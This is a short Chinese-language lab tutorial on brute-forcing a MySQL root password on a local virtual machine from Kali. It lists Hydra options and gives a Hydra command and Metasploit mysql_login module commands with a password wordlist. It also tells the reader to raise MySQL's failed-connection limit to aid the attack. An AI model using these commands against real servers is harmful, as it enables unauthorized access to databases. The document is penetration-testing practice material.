文章目录
环境配置主机数据库使用 Hydra 工具进行暴力破解使用 metsploit 暴力破解基本模块基本命令环境配置
主机
靶机: 本地Linux服务器虚拟机 + phpstudy
攻击主机:本地 Kali 虚拟机
配置好网络让主机之间相互可以通信
数据库
数据库版本:mysql 5.5.62
开启 mysql 远程连接,否则攻击主机无法建立与靶机数据库连接
我是直接在小皮面板中开启
修改 mysql 最大错误连接数量,默认为 100 ,改为 1000, 方便暴力破解
使用 Hydra 工具进行暴力破解
kali 自带的 hydra 工具是一款非常强大的暴力破解工具
直接输入hydra 查看一下 hydra 的命令
-l 小写 指定用户名-L 大写 指定用户名字典-p 小写 指定密码-P 大写 指定密码字典-C 指定用户名:密码 字典-M 指定目标ip列表文件-t 同时运行的线程数
使用 hydra 指定密码字典和 mysql 服务进行攻击,可以看到爆破成功
hydra -l root -P '密码字典文件目录' 目标ip mysql
使用 metsploit 暴力破解
Metasploit是一种安全框架,为渗透测试工程师提供了大量渗透模块和扫描模块
基本模块
基本命令
use auxiliary/scanner/mysql/mysql_login //使用 mysql 暴力破解模块set rhosts 192.168.183.134 //设置目标 ipset username root//设置用户名set pass_file /home/zyw/桌面/FastPwds.txt//指定字典run//开始爆破
爆破成功
